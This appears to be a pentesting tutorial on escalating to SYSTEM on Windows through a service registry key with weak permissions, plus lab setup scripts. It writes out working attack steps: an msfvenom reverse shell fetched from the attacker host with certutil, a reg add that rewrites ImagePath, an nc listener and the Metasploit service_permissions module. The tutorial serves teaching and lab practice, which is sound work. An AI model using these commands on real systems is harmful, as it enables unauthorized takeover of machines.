The Windows registry holds configuration for the system, applications, and users, including the definition of every service. If the permissions on a service's registry key are too loose, a non-administrative user can modify values such as ImagePath, which tells the Service Control Manager which binary to run. Since most services run as SYSTEM, this leads straight to privilege escalation. For example, if the permissions on “HKLM\SYSTEM\CurrentControlSet\Services\Apache” grant a non-administrative user write access, that user can point the service at their own executable.
What this post covers
- How to enumerate insecure registry permissions
- Exploiting the vulnerability with reg add
- Exploiting the vulnerability with Metasploit
- How to replicate this vulnerability
Enumerate with winPEAS
Scenario: We just exploited a vulnerable FTP server and landed a shell as user1. Our next goal is to escalate privileges.
winPEAS is part of the PEASS-ng project (https://github.com/carlospolop/PEASS-ng).
Host a Python web server on your Kali machine in the directory that contains the winPEAS executable.
Then download the executable to Windows with certutil.exe.
Once it is downloaded, run it with the servicesinfo option:
winpeas.exe servicesinfo
Scrolling through the output, we can see that user1 has full control over the registry key of the vulnserv service.
Let's enumerate the service a little:
sc qc vulnserv
Looking at the output above, SERVICE_START_NAME is LocalSystem, so the service runs with SYSTEM privileges. START_TYPE is AUTO_START, which means the service is launched every time the machine boots.
Our goal is to change the BINARY_PATH_NAME (the ImagePath value under the service's registry key) to a reverse shell so that it runs as NT AUTHORITY\SYSTEM.
Before we jump into the exploit, let's make sure we can either start the service ourselves or restart the machine, since the service is set to auto-start.
whoami /priv
We have “SeShutdownPrivilege” in our token. It may show as Disabled in the whoami output; that only means it is not currently enabled, and shutdown.exe enables it itself when it runs. This will be useful later on!
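The following is an added example, not part of the original post: a manual version of what winPEAS reports under servicesinfo, run as the low-privileged user on the target. It walks every key under HKLM\SYSTEM\CurrentControlSet\Services, keeps the ones whose ACL grants our user (directly or through a group) a right that lets us rewrite ImagePath, and for each one also reads the service's own DACL via sc.exe sdshow to tell us whether we can start it ourselves or have to rely on a reboot. The right bits and the LocalSystem/Start value meanings are standard Windows constants; the account name and service name are whatever exists on your box.

```powershell
# Added example (not from the post): manual check for services whose registry
# key lets the current user rewrite ImagePath. Run as the low-privileged user.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Registry rights that let us set ImagePath, or change the ACL and then set it:
# SetValue 0x2, ChangePermissions 0x40000, TakeOwnership 0x80000, plus the
# generic GENERIC_ALL 0x10000000 / GENERIC_WRITE 0x40000000 bits.
$regWriteBits = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Test-ServiceStart {
    param([string]$Name)
    # sc.exe sdshow prints the service's security descriptor as SDDL. Look for an
    # Allow ACE for one of our SIDs with SERVICE_START (0x10) or a generic right
    # (GENERIC_ALL 0x10000000, GENERIC_EXECUTE 0x20000000) that implies it.
    $sddl = sc.exe sdshow $Name | Where-Object { $_ -match '^D:' } | Select-Object -First 1
    if (-not $sddl) { return $false }        # access denied or no such service
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        if (($ace.AccessMask -band (0x10 -bor 0x10000000 -bor 0x20000000)) -eq 0) { continue }
        if ($mySids -contains $ace.SecurityIdentifier.Value) { return $true }
    }
    return $false
}

Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object {
    $key = $_
    # Keys we cannot even read the ACL of are skipped.
    try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate(
                       [System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }                                    # unresolvable account
        if ($mySids -notcontains $sid) { continue }
        if (([int]$ace.RegistryRights -band $regWriteBits) -eq 0) { continue }
        [pscustomobject]@{
            Service   = $key.PSChildName
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.RegistryRights
            ImagePath = $key.GetValue('ImagePath')
            RunsAs    = $key.GetValue('ObjectName')     # LocalSystem = NT AUTHORITY\SYSTEM
            AutoStart = ($key.GetValue('Start') -eq 2)  # 2 = SERVICE_AUTO_START
            CanStart  = Test-ServiceStart $key.PSChildName
        }
    }
} | Format-Table -AutoSize
```

A row with RunsAs = LocalSystem and AutoStart = True is the situation in this post: even when CanStart is False, rewriting ImagePath and rebooting (which SeShutdownPrivilege allows) gets the payload executed as SYSTEM. A row with CanStart = True is the case the Metasploit module below can handle on its own.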
Exploit 1 (Manually)
To exploit this, let's create a reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.4.4 LPORT=53 -f exe > reverse.exe
Once the reverse shell is created, we need to bring it over to the Windows machine.
Let's host a Python web server on Kali in the directory where the reverse shell is located:
python3 -m http.server 80
Then use certutil.exe on Windows to download the file:
certutil.exe -urlcache -f http://192.168.4.4/reverse.exe reverse.exe
Once the reverse shell is downloaded, we can use reg add to overwrite ImagePath with the path to the reverse shell (ImagePath is normally a REG_EXPAND_SZ value, so we keep that type):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vulnserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\user1\reverse.exe" /f
Now if we check the service's binary path again, it shows the reverse shell executable:
sc qc vulnserv
With everything in place, start a listener on Kali:
nc -lnvp 53
Now restart the Windows machine. By default shutdown /r waits 30 seconds before rebooting; add /t 0 if you want it to happen immediately.
shutdown /r
After a minute or so, we get a reverse shell on Kali as NT AUTHORITY\SYSTEM. One caveat: reverse.exe is not a real service binary and never checks in with the Service Control Manager, so the SCM will terminate it once its start timeout (30 seconds by default) expires. Spawn a second process or migrate as soon as the shell lands, or it will die underneath you.
Exploit 2 (Metasploit and Meterpreter)
The Metasploit route is a little more limited. The service_permissions module needs to restart the service itself, so it only works when our user has direct permission to start and stop the service. In the previous scenario we had to reboot the entire machine, which the module does not do. For this example, “user1” has been granted permission to start and stop the service directly.
First, background your meterpreter session and note the session number.
We'll be using “exploit/windows/local/service_permissions”. Also make sure you choose a matching payload; I'm using “windows/x64/meterpreter/reverse_tcp” because the target is 64-bit Windows.
use exploit/windows/local/service_permissions
set payload windows/x64/meterpreter/reverse_tcp
Now configure LHOST and LPORT, and set SESSION to the number of the meterpreter session you backgrounded:
set LHOST 192.168.4.4
set LPORT 443
set session 1
You can review the options before launching (show options).
Now run it with “exploit”. The shell takes a while to return; it took about 3 minutes for me.
I personally prefer the first method since it is faster and gives you more control over what to name the reverse shell, where to place it, and so on.
Replicate the Vulnerability
On the Windows machine, log in as an Administrator.
Open a command prompt and create a service. Note that sc.exe requires a space after “binPath=” and “start=”; without it the command fails:
sc create vulnserv binPath= "C:\Services\service.exe" start= auto
Now open regedit, navigate to the service's key, right-click it and choose Permissions:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vulnserv
Then click Add.
Type in the name of the user when it asks you to enter the object name.
Now select that user and grant them Full Control over the key. Make sure you click Apply afterwards.
If you also want the user to be able to start and stop the service (required for the Metasploit method), grant it with subinacl.exe. The letters stand for Pause/continue, sTart, stOp and Change config:
subinacl.exe /service vulnserv /grant=user1=PTOC
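The same lab setup as a script, added here as an example rather than taken from the post: it creates the service, gives the user Full Control on the service's registry key (what the regedit clicks above do), optionally appends a service ACE equivalent to subinacl's PTOC using sc.exe sdset instead of the separate subinacl download, and then prints both ACLs so you can confirm what user1 will see. Run it from an elevated PowerShell prompt; the account name user1 and the placeholder path C:\Services\service.exe are assumptions carried over from the walkthrough.

```powershell
# Added lab-setup example (not from the post). Run from an elevated PowerShell
# prompt on the Windows VM. Assumptions: the low-privileged account is 'user1'
# and C:\Services\service.exe is whatever placeholder binary you created.
$svc  = 'vulnserv'
$user = 'user1'

# 1. Create the auto-start service. sc.exe needs the space after "binPath=" and "start=".
sc.exe create $svc binPath= "C:\Services\service.exe" start= auto

# 2. Grant the user Full Control over the service's registry key
#    (same result as Permissions -> Add -> Full Control in regedit).
$keyPath = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
$acl  = Get-Acl -Path $keyPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            $user,
            [System.Security.AccessControl.RegistryRights]::FullControl,
            [System.Security.AccessControl.InheritanceFlags]'ContainerInherit,ObjectInherit',
            [System.Security.AccessControl.PropagationFlags]::None,
            [System.Security.AccessControl.AccessControlType]::Allow)
$acl.AddAccessRule($rule)
Set-Acl -Path $keyPath -AclObject $acl

# 3. Optional, for the Metasploit method: let the user start/stop the service.
#    Equivalent of subinacl PTOC: RP = start, WP = stop, DT = pause/continue,
#    DC = change config. Append an Allow ACE for the user's SID to the DACL.
$sid  = (New-Object System.Security.Principal.NTAccount($user)).Translate(
            [System.Security.Principal.SecurityIdentifier]).Value
$sddl = sc.exe sdshow $svc | Where-Object { $_ -match '^D:' } | Select-Object -First 1
$dacl, $sacl = $sddl -split '(?=S:)', 2      # keep the SACL part, if any, untouched
$newSddl = $dacl + "(A;;RPWPDTDC;;;$sid)" + $sacl
sc.exe sdset $svc $newSddl

# 4. Verify from the attacker's point of view.
(Get-Acl $keyPath).Access |
    Where-Object { $_.IdentityReference -like "*\$user" } |
    Format-Table IdentityReference, RegistryRights, AccessControlType
sc.exe sdshow $svc
```

Skip step 3 if you want to reproduce the first, reboot-based exploit exactly; with only the registry ACL changed, user1 can rewrite ImagePath but cannot start the service, which is what forces the shutdown /r in the walkthrough.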